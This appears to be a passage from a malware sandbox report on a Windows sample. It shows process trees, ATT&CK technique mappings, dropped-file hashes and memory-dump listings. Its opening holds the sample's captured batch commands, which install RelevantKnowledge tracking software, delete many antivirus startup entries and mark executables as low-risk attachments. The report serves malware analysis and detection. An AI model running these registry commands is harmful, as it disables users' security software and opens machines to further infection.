"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "UninstURL" /t REG_SZ /d "http://www.relevantknowledge.com/confirmuninstall.aspx?siteid=2600&campaign_id=794" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RevertPath" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f ) else ( Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "24914" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "HideZoneInfoOnProperties" /t REG_DWORD /d "1" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "2" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "DisplayName" /t REG_SZ /d "RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "UninstallString" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK_Path" /t REG_SZ /d "%windir%\system32\rlls.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK64_Path" /t REG_SZ /d "%windir%\system32\rlls64.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "LD64_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg64.exe" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "KS_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlls.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "SV_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlservice.exe" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy" /v "" /t REG_SZ /d "" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RunLine" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg.exe -boot" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "ServiceName" /t REG_SZ /d "RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "UninstURL" /t REG_SZ /d "http://www.relevantknowledge.com/confirmuninstall.aspx?siteid=2600&campaign_id=794" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RevertPath" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:32 Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:64 Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:64 )
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4060

C:\Users\Admin\AppData\Local\Temp\D1FC.exe
C:\Users\Admin\AppData\Local\Temp\D1FC.exe
1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3412

C:\Windows\SysWOW64\cmd.exe
cmd /Q /C C:\Users\Admin\AppData\Local\Temp/s.bat
2⤵
- Drops startup file
PID:3132

C:\Users\Admin\AppData\Local\Temp\D420.exe
C:\Users\Admin\AppData\Local\Temp\D420.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3732

C:\Users\Admin\AppData\Local\Temp\D420.exe
C:\Users\Admin\AppData\Local\Temp\D420.exe
2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3908

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3908 -s 1452
3⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:2176

C:\Users\Admin\AppData\Local\Temp\D951.exe
C:\Users\Admin\AppData\Local\Temp\D951.exe
1⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:1192

C:\Users\Admin\AppData\Local\Temp\2F42.exe
C:\Users\Admin\AppData\Local\Temp\2F42.exe
1⤵
- Executes dropped EXE
PID:496

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 496 -s 732
2⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:2500

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 496 -s 748
2⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:4064

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 496 -s 844
2⤵
- Program crash
PID:4060

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 496 -s 892
2⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:2492

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 496 -s 888
2⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:2080

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:3540

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:2040

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:420

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:3936

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:2428

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:1624

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:900

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:1944

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:508

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Disabling Security Tools

T1089

Virtualization/Sandbox Evasion

T1497

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

System Information Discovery

T1082

Peripheral Device Discovery

T1120

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Runtimebroker.exe
MD5
16e7880b76dbc82d50fd96f38d1c2692

SHA1
b8b49ef406f74e50c7386f2fecbff18447ad9f4d

SHA256
9ccef739ddc3b6688be2a72a754c95f300f24d3b5181a3896328681bf933b4d7

SHA512
69071850ce17baaa5884f9531e2c7632b61a5777d58b826b1365d6f651f647a3521d456ceed29fbf5cf47ebf83176634371e7e5245a44d4b13b0855ffe10d6e3

Download Submit
C:\ProgramData\Runtimebroker.exe
MD5
16e7880b76dbc82d50fd96f38d1c2692

SHA1
b8b49ef406f74e50c7386f2fecbff18447ad9f4d

SHA256
9ccef739ddc3b6688be2a72a754c95f300f24d3b5181a3896328681bf933b4d7

SHA512
69071850ce17baaa5884f9531e2c7632b61a5777d58b826b1365d6f651f647a3521d456ceed29fbf5cf47ebf83176634371e7e5245a44d4b13b0855ffe10d6e3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
MD5
c558fdaa3884f969f1ec904ae7bbd991

SHA1
b4f85d04f6bf061a17f52c264c065b786cfd33ff

SHA256
3e2559b6ca355d011b05b1fcf35ed8b2375586fe6bb01bc367f24eb8ac82975e

SHA512
6523c778fd9fab0085fafe7b4049e591403865212cc25109cb11f11584c7258bc15e0a5524d089d0f662151b22f3f8e6f871091cec57064c69a9a95903f9e7d4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
c3dec36e807237cbf1861e68cd19b4a6

SHA1
8d9faa98918bc2ce525b0a8003558c5eacb8a445

SHA256
53cb6ecdc9957bd1cb464e8a5ba99bad2adaeb69764accfe7ce6e817c27a1340

SHA512
3fdfb356726beb9d8f1f184210257c97715abf738bee1523711ed2c100c5e8f492915dd3e772d6236e4b7caf7f459e231332d5bd285c298eea8d3589be5afb25

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
02c09d0f396bec915b5fe1c5fb75ff4f

SHA1
0f01c003a1fed687589ea9d9b20d05b2efe77605

SHA256
d732b27eff7f7511a53fa14c8a3ad96dacd6f9153a04d83f24ea813d5943fd47

SHA512
d85ee25fe1a5ebe65810718cab3da3e4a9d3e407317bf2cb6a0cb916e526623153a2d80bbb6c7de25e1cddf0645e1de8c4cbc3bd8ed1b9f1a8b9774332919f66

Download Submit
C:\Users\Admin\AppData\Local\Temp\2F42.exe
MD5
4297e9e27602c1ab910f6c214a2b3ce7

SHA1
a2ee7d601157c05818a3fd2dd46e51b272078b95

SHA256
c6ce666831320963b654b1730a946524fb370c4d7a41822deee3bbe6f367fb8d

SHA512
a0e4e3a61e564b27d86683a56b54b9305d6566a0388d33c05644b88a5fb071e99e8bb1972a9e05cd2fe963420a0a9a45a61a8de6709914be3d9d8982916759e5

Download Submit
C:\Users\Admin\AppData\Local\Temp\2F42.exe
MD5
4297e9e27602c1ab910f6c214a2b3ce7

SHA1
a2ee7d601157c05818a3fd2dd46e51b272078b95

SHA256
c6ce666831320963b654b1730a946524fb370c4d7a41822deee3bbe6f367fb8d

SHA512
a0e4e3a61e564b27d86683a56b54b9305d6566a0388d33c05644b88a5fb071e99e8bb1972a9e05cd2fe963420a0a9a45a61a8de6709914be3d9d8982916759e5

Download Submit
C:\Users\Admin\AppData\Local\Temp\CFC9.exe
MD5
16e7880b76dbc82d50fd96f38d1c2692

SHA1
b8b49ef406f74e50c7386f2fecbff18447ad9f4d

SHA256
9ccef739ddc3b6688be2a72a754c95f300f24d3b5181a3896328681bf933b4d7

SHA512
69071850ce17baaa5884f9531e2c7632b61a5777d58b826b1365d6f651f647a3521d456ceed29fbf5cf47ebf83176634371e7e5245a44d4b13b0855ffe10d6e3

Download Submit
C:\Users\Admin\AppData\Local\Temp\CFC9.exe
MD5
16e7880b76dbc82d50fd96f38d1c2692

SHA1
b8b49ef406f74e50c7386f2fecbff18447ad9f4d

SHA256
9ccef739ddc3b6688be2a72a754c95f300f24d3b5181a3896328681bf933b4d7

SHA512
69071850ce17baaa5884f9531e2c7632b61a5777d58b826b1365d6f651f647a3521d456ceed29fbf5cf47ebf83176634371e7e5245a44d4b13b0855ffe10d6e3

Download Submit
C:\Users\Admin\AppData\Local\Temp\D1FC.exe
MD5
b19ac380411ed5d8b5a7e7e0c1da61a6

SHA1
9665c20336a5ce437bbf7b564370bfa43e99954c

SHA256
aba88a19b2f6e2cf9a6a41ab8661d83c433acec363028f58dd74d37e335c7619

SHA512
73b4e3555cf9496a7138a2c7071ed81a754493afaf15f604a305f3eb051ed72645731a6174b0934f24371dbe5bd8c0185516f87778a018d84df4fff8aea0c208

Download Submit
C:\Users\Admin\AppData\Local\Temp\D1FC.exe
MD5
b19ac380411ed5d8b5a7e7e0c1da61a6

SHA1
9665c20336a5ce437bbf7b564370bfa43e99954c

SHA256
aba88a19b2f6e2cf9a6a41ab8661d83c433acec363028f58dd74d37e335c7619

SHA512
73b4e3555cf9496a7138a2c7071ed81a754493afaf15f604a305f3eb051ed72645731a6174b0934f24371dbe5bd8c0185516f87778a018d84df4fff8aea0c208

Download Submit
C:\Users\Admin\AppData\Local\Temp\D420.exe
MD5
5707ddada5b7ea6bef434cd294fa12e1

SHA1
45bb285a597b30e100ed4b15d96a29d718697e5e

SHA256
85205aa3ad824b5172d5da841d253c3a54aff5d00eb2c208029e9453008f132c

SHA512
91cbdbf8da7e4e34de45a99359bdc321a66d6646ed14a1042346824c8daa6237281eff3b00fd162009c5e3204e5a7cd3b944f05e18b7f9066d0f9dd16b56bf13

Download Submit
C:\Users\Admin\AppData\Local\Temp\D420.exe
MD5
5707ddada5b7ea6bef434cd294fa12e1

SHA1
45bb285a597b30e100ed4b15d96a29d718697e5e

SHA256
85205aa3ad824b5172d5da841d253c3a54aff5d00eb2c208029e9453008f132c

SHA512
91cbdbf8da7e4e34de45a99359bdc321a66d6646ed14a1042346824c8daa6237281eff3b00fd162009c5e3204e5a7cd3b944f05e18b7f9066d0f9dd16b56bf13

Download Submit
C:\Users\Admin\AppData\Local\Temp\D420.exe
MD5
5707ddada5b7ea6bef434cd294fa12e1

SHA1
45bb285a597b30e100ed4b15d96a29d718697e5e

SHA256
85205aa3ad824b5172d5da841d253c3a54aff5d00eb2c208029e9453008f132c

SHA512
91cbdbf8da7e4e34de45a99359bdc321a66d6646ed14a1042346824c8daa6237281eff3b00fd162009c5e3204e5a7cd3b944f05e18b7f9066d0f9dd16b56bf13

Download Submit
C:\Users\Admin\AppData\Local\Temp\D951.exe
MD5
717d65dba56f47e540dca074c3977b3d

SHA1
d58aa30f826f41663e693f0ad930fdce584f1672

SHA256
61fb1160ae372d9ba1c95400d5439450c6a66cdf073fa50ee2d5d10c4952cbb3

SHA512
b06e4358411eb8f6315c574922c021bd57218b3e6a0ed727df6b44e20e7818d40fb0347050ce9145ea7e0fd56a7fa93a2358e524c0df030d6d44067c7c83510d

Download Submit
C:\Users\Admin\AppData\Local\Temp\D951.exe
MD5
717d65dba56f47e540dca074c3977b3d

SHA1
d58aa30f826f41663e693f0ad930fdce584f1672

SHA256
61fb1160ae372d9ba1c95400d5439450c6a66cdf073fa50ee2d5d10c4952cbb3

SHA512
b06e4358411eb8f6315c574922c021bd57218b3e6a0ed727df6b44e20e7818d40fb0347050ce9145ea7e0fd56a7fa93a2358e524c0df030d6d44067c7c83510d

Download Submit
C:\Users\Admin\AppData\Local\Temp\s.bat
MD5
cedbfd38cc5942a15b6757a67910f83c

SHA1
cb422b63c254204290f2e3a165b0fca0b4beef57

SHA256
2f2d0e136d21c19027890d11c6cfbfd392674bb8df04767494bd8e57a2863d87

SHA512
1f08ec7170e648cccef1a5646c9ce06c23d781a164b9209a5834a97074bc1e8fd8bcf7729b1e50ec3f44d53f02a2934224e5b03dbfb9f2d35a30a14eae8e464c

Download Submit
\Users\Admin\AppData\LocalLow\sqlite3.dll
MD5
f964811b68f9f1487c2b41e1aef576ce

SHA1
b423959793f14b1416bc3b7051bed58a1034025f

SHA256
83bc57dcf282264f2b00c21ce0339eac20fcb7401f7c5472c0cd0c014844e5f7

SHA512
565b1a7291c6fcb63205907fcd9e72fc2e11ca945afc4468c378edba882e2f314c2ac21a7263880ff7d4b84c2a1678024c1ac9971ac1c1de2bfa4248ec0f98c4

Download Submit
memory/420-269-0x0000000003010000-0x000000000301B000-memory.dmp

Filesize
44KB

Download
memory/420-268-0x0000000003020000-0x0000000003027000-memory.dmp

Filesize
28KB

Download
memory/420-248-0x0000000000000000-mapping.dmp

Download
memory/496-220-0x0000000000000000-mapping.dmp

Download
memory/496-231-0x00000000048A0000-0x0000000004931000-memory.dmp

Filesize
580KB

Download
memory/496-243-0x0000000000400000-0x0000000002CA9000-memory.dmp

Filesize
40.7MB

Download
memory/508-507-0x0000000000150000-0x0000000000159000-memory.dmp

Filesize
36KB

Download
memory/508-506-0x0000000000160000-0x0000000000165000-memory.dmp

Filesize
20KB

Download
memory/508-505-0x0000000000000000-mapping.dmp

Download
memory/784-153-0x0000000000400000-0x0000000002C7D000-memory.dmp

Filesize
40.5MB

Download
memory/784-150-0x0000000000000000-mapping.dmp

Download
memory/900-500-0x0000000002C00000-0x0000000002C04000-memory.dmp

Filesize
16KB

Download
memory/900-502-0x00000000029F0000-0x00000000029F9000-memory.dmp

Filesize
36KB

Download
memory/900-493-0x0000000000000000-mapping.dmp

Download
memory/1192-143-0x0000000006120000-0x0000000006121000-memory.dmp

Filesize
4KB

Download
memory/1192-148-0x0000000005B00000-0x0000000005B01000-memory.dmp

Filesize
4KB

Download
memory/1192-167-0x0000000007100000-0x0000000007101000-memory.dmp

Filesize
4KB

Download
memory/1192-149-0x0000000005C60000-0x0000000005C61000-memory.dmp

Filesize
4KB

Download
memory/1192-144-0x0000000005A00000-0x0000000005A01000-memory.dmp

Filesize
4KB

Download
memory/1192-133-0x0000000000000000-mapping.dmp

Download
memory/1192-146-0x0000000005AA0000-0x0000000005AA1000-memory.dmp

Filesize
4KB

Download
memory/1192-145-0x0000000005A60000-0x0000000005A61000-memory.dmp

Filesize
4KB

Download
memory/1192-139-0x0000000000BB0000-0x0000000000BB1000-memory.dmp

Filesize
4KB

Download
memory/1192-140-0x00000000774D0000-0x000000007765E000-memory.dmp

Filesize
1.6MB

Download
memory/1192-161-0x0000000006EC0000-0x0000000006EC1000-memory.dmp

Filesize
4KB

Download
memory/1192-178-0x00000000074B0000-0x00000000074B1000-memory.dmp

Filesize
4KB

Download
memory/1192-175-0x00000000073B0000-0x00000000073B1000-memory.dmp

Filesize
4KB

Download
memory/1192-164-0x00000000075C0000-0x00000000075C1000-memory.dmp

Filesize
4KB

Download
memory/1340-184-0x00000000090D0000-0x00000000090D1000-memory.dmp

Filesize
4KB

Download
memory/1340-158-0x0000000000000000-mapping.dmp

Download
memory/1340-165-0x0000000004A90000-0x0000000004A91000-memory.dmp

Filesize
4KB

Download
memory/1340-168-0x0000000007310000-0x0000000007311000-memory.dmp

Filesize
4KB

Download
memory/1340-169-0x0000000007BC0000-0x0000000007BC1000-memory.dmp

Filesize
4KB

Download
memory/1340-171-0x0000000007E20000-0x0000000007E21000-memory.dmp

Filesize
4KB

Download
memory/1340-172-0x0000000007B90000-0x0000000007B91000-memory.dmp

Filesize
4KB

Download
memory/1340-163-0x0000000007420000-0x0000000007421000-memory.dmp

Filesize
4KB

Download
memory/1340-162-0x0000000004890000-0x0000000004891000-memory.dmp

Filesize
4KB

Download
memory/1340-183-0x00000000093D0000-0x00000000093D1000-memory.dmp

Filesize
4KB

Download
memory/1340-204-0x0000000004A93000-0x0000000004A94000-memory.dmp

Filesize
4KB

Download
memory/1340-185-0x0000000009330000-0x0000000009331000-memory.dmp

Filesize
4KB

Download
memory/1340-166-0x0000000004A92000-0x0000000004A93000-memory.dmp

Filesize
4KB

Download
memory/1624-492-0x0000000000EA0000-0x0000000000EA6000-memory.dmp

Filesize
24KB

Download
memory/1624-438-0x0000000000000000-mapping.dmp

Download
memory/1624-494-0x0000000000E90000-0x0000000000E9C000-memory.dmp

Filesize
48KB

Download
memory/1944-501-0x0000000000000000-mapping.dmp

Download
memory/1944-504-0x00000000007C0000-0x00000000007C9000-memory.dmp

Filesize
36KB

Download
memory/1944-503-0x00000000007D0000-0x00000000007D5000-memory.dmp

Filesize
20KB

Download
memory/2040-239-0x0000000000000000-mapping.dmp

Download
memory/2040-244-0x0000000000D90000-0x0000000000D97000-memory.dmp

Filesize
28KB

Download
memory/2040-246-0x0000000000D80000-0x0000000000D8C000-memory.dmp

Filesize
48KB

Download
memory/2428-345-0x0000000000000000-mapping.dmp

Download
memory/2428-440-0x00000000026F0000-0x00000000026F9000-memory.dmp

Filesize
36KB

Download
memory/2428-437-0x0000000002700000-0x0000000002705000-memory.dmp

Filesize
20KB

Download
memory/2440-114-0x0000000000400000-0x0000000000409000-memory.dmp

Filesize
36KB

Download
memory/2440-115-0x0000000000402E1A-mapping.dmp

Download
memory/2832-117-0x0000000001050000-0x0000000001066000-memory.dmp

Filesize
88KB

Download
memory/3132-155-0x0000000000000000-mapping.dmp

Download
memory/3252-128-0x0000000000400000-0x0000000002C7D000-memory.dmp

Filesize
40.5MB

Download
memory/3252-127-0x0000000002CD0000-0x0000000002D0B000-memory.dmp

Filesize
236KB

Download
memory/3252-118-0x0000000000000000-mapping.dmp

Download
memory/3412-147-0x0000000000400000-0x0000000002D86000-memory.dmp

Filesize
41.5MB

Download
memory/3412-142-0x0000000003400000-0x0000000003643000-memory.dmp

Filesize
2.3MB

Download
memory/3412-154-0x0000000005240000-0x0000000005451000-memory.dmp

Filesize
2.1MB

Download
memory/3412-121-0x0000000000000000-mapping.dmp

Download
memory/3412-156-0x0000000000400000-0x0000000002D86000-memory.dmp

Filesize
41.5MB

Download
memory/3540-232-0x0000000002A70000-0x0000000002ADB000-memory.dmp

Filesize
428KB

Download
memory/3540-230-0x0000000002AE0000-0x0000000002B54000-memory.dmp

Filesize
464KB

Download
memory/3540-223-0x0000000000000000-mapping.dmp

Download
memory/3732-136-0x00000000053C0000-0x00000000058BE000-memory.dmp

Filesize
5.0MB

Download
memory/3732-132-0x00000000054C0000-0x00000000054C1000-memory.dmp

Filesize
4KB

Download
memory/3732-131-0x00000000058C0000-0x00000000058C1000-memory.dmp

Filesize
4KB

Download
memory/3732-135-0x0000000005640000-0x0000000005641000-memory.dmp

Filesize
4KB

Download
memory/3732-129-0x0000000000B20000-0x0000000000B21000-memory.dmp

Filesize
4KB

Download
memory/3732-124-0x0000000000000000-mapping.dmp

Download
memory/3732-187-0x00000000056F0000-0x0000000005711000-memory.dmp

Filesize
132KB

Download
memory/3908-202-0x0000000000400000-0x0000000000495000-memory.dmp

Filesize
596KB

Download
memory/3908-191-0x000000000044003F-mapping.dmp

Download
memory/3908-188-0x0000000000400000-0x0000000000495000-memory.dmp

Filesize
596KB

Download
memory/3936-344-0x0000000000100000-0x000000000010F000-memory.dmp

Filesize
60KB

Download
memory/3936-343-0x0000000000110000-0x0000000000119000-memory.dmp

Filesize
36KB

Download
memory/3936-274-0x0000000000000000-mapping.dmp

Download
memory/3988-116-0x0000000000030000-0x000000000003A000-memory.dmp

Filesize
40KB

Download
memory/3996-207-0x00000000072F2000-0x00000000072F3000-memory.dmp

Filesize
4KB

Download
memory/3996-194-0x0000000000000000-mapping.dmp

Download
memory/3996-205-0x0000000008410000-0x0000000008411000-memory.dmp

Filesize
4KB

Download
memory/3996-224-0x0000000009CE0000-0x0000000009E3B000-memory.dmp

Filesize
1.4MB

Download
memory/3996-206-0x00000000072F0000-0x00000000072F1000-memory.dmp

Filesize
4KB

Download
memory/3996-219-0x00000000072F3000-0x00000000072F4000-memory.dmp

Filesize
4KB

Download
memory/3996-217-0x000000000A0E0000-0x000000000A0E1000-memory.dmp

Filesize
4KB

Download
memory/4020-254-0x0000000009050000-0x0000000009083000-memory.dmp

Filesize
204KB

Download
memory/4020-225-0x0000000000000000-mapping.dmp

Download
memory/4020-233-0x0000000006CE0000-0x0000000006CE1000-memory.dmp

Filesize
4KB

Download
memory/4020-234-0x0000000006CE2000-0x0000000006CE3000-memory.dmp

Filesize
4KB

Download
memory/4020-270-0x000000007F4F0000-0x000000007F4F1000-memory.dmp

Filesize
4KB

Download
memory/4020-271-0x0000000006CE3000-0x0000000006CE4000-memory.dmp

Filesize
4KB

Download
memory/4060-499-0x0000000000000000-mapping.dmp

Download